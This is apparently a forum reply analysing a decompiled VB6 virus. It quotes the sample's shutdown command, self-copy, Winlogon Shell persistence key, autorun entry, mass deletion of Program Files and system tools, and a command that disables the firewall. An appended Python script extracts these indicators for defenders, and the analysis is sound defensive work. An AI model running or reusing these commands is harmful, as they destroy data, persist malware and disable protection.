I didn't see any source.
Dear friend, I don't know anything, and I don't mean to offend you; I just want to analyze it, that's all.
The virus above uses 4 APIs, named:
Code:
Private Declare Function DestroyWindow Lib "user32" Alias "DestroyWindow" (ByVal hwnd As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Then it uses the shell command to shut down the system:
Code:
"shutdown -s -t 4 -c SMTvir's_saying_goodbye"
It has 5 timers, and its timers can be killed.
It copies itself to drive C:
Code:
loc_00402FC5: FileCopy MSVBVM60.DLL.__vbaStrVarVal("", "", "c:\start up.exe"), %x2
Then it sets a simple registry key at this address:
Code:
loc_00403008: call MSVBVM60.DLL.__vbaVarSetVar("", CreateObject("wscript.shell", 00000000h))
loc_00403015: var_0000008C = 8
loc_0040302D: var_00000084 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
And it has written out the drive names one by one and deletes the files below:
Code:
loc_004030BA: var_00000084 = "C:\Program Files"
loc_004030D5: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004030D8: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004030E4: var_0000008C = 8
loc_004030F9: var_00000084 = &H4021F4
loc_00403114: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403117: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403123: var_0000008C = 8
loc_00403138: var_00000084 = "E:\Program Files"
loc_00403153: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403156: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403162: var_0000008C = 8
loc_00403177: var_00000084 = "F:\Program Files"
loc_00403192: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403195: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004031A1: var_0000008C = 8
loc_004031B6: var_00000084 = "C:\WordPad.exe"
loc_004031D1: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004031D4: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004031E0: var_0000008C = 8
loc_004031F5: var_00000084 = &H402290
loc_00403210: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403213: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040321F: var_0000008C = 8
loc_00403234: var_00000084 = "E:\WordPad.exe"
loc_0040324F: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403252: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403263: var_0000008C = 8
loc_00403269: var_00000084 = "F:\WordPad.exe"
loc_0040328E: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403291: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040329D: var_0000008C = 8
loc_004032B2: var_00000084 = "C:\NotePad.exe"
loc_004032CD: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004032D0: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004032DC: var_0000008C = 8
loc_004032F1: var_00000084 = &H402320
loc_0040330C: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040330F: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040331B: var_0000008C = 8
loc_00403330: var_00000084 = "E:\NotePad.exe"
loc_0040334B: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040334E: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_0040335D: var_00000084 = "F:\NotePad.exe"
loc_00403363: var_0000008C = 8
loc_0040338A: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040338D: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403399: var_0000008C = 8
loc_004033AE: var_00000084 = "C:\Calculator.exe"
loc_004033C9: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004033CC: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004033D8: var_0000008C = 8
loc_004033ED: var_00000084 = &H4023B4
loc_00403408: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040340B: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403417: var_0000008C = 8
loc_0040342C: var_00000084 = "E:\Calculator.exe"
loc_00403447: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_0040344A: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403456: var_0000008C = 8
loc_00403469: var_00000084 = "F:\Calculator.exe"
loc_00403486: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403489: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403495: var_0000008C = 8
loc_004034AA: var_00000084 = "C:\Paint.exe"
loc_004034C5: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004034C8: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004034D4: var_0000008C = 8
loc_004034E9: var_00000084 = &H40244C
loc_00403504: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403507: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403513: var_0000008C = 8
loc_00403528: var_00000084 = "E:\Paint.exe"
loc_00403543: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403546: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_00403552: var_0000008C = 8
loc_00403567: var_00000084 = "F:\Paint.exe"
loc_00403582: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_00403585: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
This is where I burst out laughing :-)
Then it says it has an autorun (you wrote out every drive name one by one; you could have gotten the list of drives with a loop and the Drive control!):
Code:
loc_00404A37: call &("13#1", "[autorun]")
loc_00404A42: call MSVBVM60.DLL.__vbaStrMove
loc_00404A4E: call &("open=virus.exe", MSVBVM60.DLL.__vbaStrMove)
loc_00404A59: call MSVBVM60.DLL.__vbaStrMove
After that it says it disables the firewall, which is true:
Code:
loc_00402E27: var_00000084 = "netsh firewall set opmode disable"
loc_00402E31: var_0000008C = 8
loc_00402E3B: var_7C = "netsh firewall set opmode disable"
Of course, the source was also taken from here:
Code:
http://www.google.com/#q=netsh+firewall+set+opmode+disable+vb6&bih=532&biw=1345&fp=46c85a59d0d13eb3&hl=fa
In total, 134 seconds of my time were wasted :-)
Good luck.
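A small triage script, added here as an example and not the post author's code, that walks the decompiler listing quoted above and pulls out the indicators the post discusses: the dropped copy, the Winlogon Shell key, the netsh command, and each Deletefile target, including the literals the decompiler left as raw addresses. The excerpt it parses is constructed from lines in the post; the regexes, key names and the "most recent assignment is the call's argument" rule are my own assumptions about the listing format.

```python
"""Triage helper for the VB6 decompiler listing quoted in the post (added example,
not the post author's code): pulls host indicators out of the `loc_...` lines."""
import re

# Constructed excerpt: lines copied from the listing quoted in the post.
LISTING = r"""
loc_00402E27: var_00000084 = "netsh firewall set opmode disable"
loc_00402FC5: FileCopy MSVBVM60.DLL.__vbaStrVarVal("", "", "c:\start up.exe"), %x2
loc_0040302D: var_00000084 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
loc_004030BA: var_00000084 = "C:\Program Files"
loc_004030D5: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004030D8: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h))
loc_004030F9: var_00000084 = &H4021F4
loc_00403114: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
loc_004031B6: var_00000084 = "C:\WordPad.exe"
loc_004031D1: call MSVBVM60.DLL.__vbaObjVar("", "Deletefile", 00000001h)
"""

STRING_RE = re.compile(r'^loc_[0-9A-Fa-f]+:\s+var_\w+\s*=\s*"([^"]*)"\s*$')
ADDR_RE = re.compile(r'^loc_[0-9A-Fa-f]+:\s+var_\w+\s*=\s*(&H[0-9A-Fa-f]+)\s*$')
COPY_RE = re.compile(r'FileCopy .*"([^"]+)"\)')
COMMAND_NAMES = {"netsh", "shutdown"}  # commands the post shows the sample running
KEYS = ("dropped_files", "registry_keys", "commands",
        "delete_targets", "unresolved_delete_targets")

def _add(found: dict, key: str, value: str) -> None:
    if value not in found[key]:  # the decompiler emits every call twice (ObjVar + LateMemCall)
        found[key].append(value)

def extract_indicators(listing: str) -> dict:
    """Walk the listing in order; a Deletefile call takes the most recent var_ assignment as its target."""
    found = {k: [] for k in KEYS}
    last = None  # (kind, value) of the most recent var_ assignment
    for line in listing.splitlines():
        if m := COPY_RE.search(line):
            _add(found, "dropped_files", m.group(1))
        elif m := STRING_RE.match(line):
            last = ("str", m.group(1))
            if m.group(1).upper().startswith("HKEY_"):
                _add(found, "registry_keys", m.group(1))
            elif m.group(1).split(" ", 1)[0].lower() in COMMAND_NAMES:
                _add(found, "commands", m.group(1))
        elif m := ADDR_RE.match(line):
            last = ("addr", m.group(1))  # literal the decompiler did not resolve to a string
        elif '"Deletefile"' in line and last is not None:
            kind, value = last
            _add(found, "delete_targets" if kind == "str" else "unresolved_delete_targets", value)
    return found
```

Calling `extract_indicators(LISTING)` returns a dict of lists; on the full listing, `delete_targets` is the list you would turn into a file-restore checklist, and `unresolved_delete_targets` tells you which string addresses still need to be looked up in the binary.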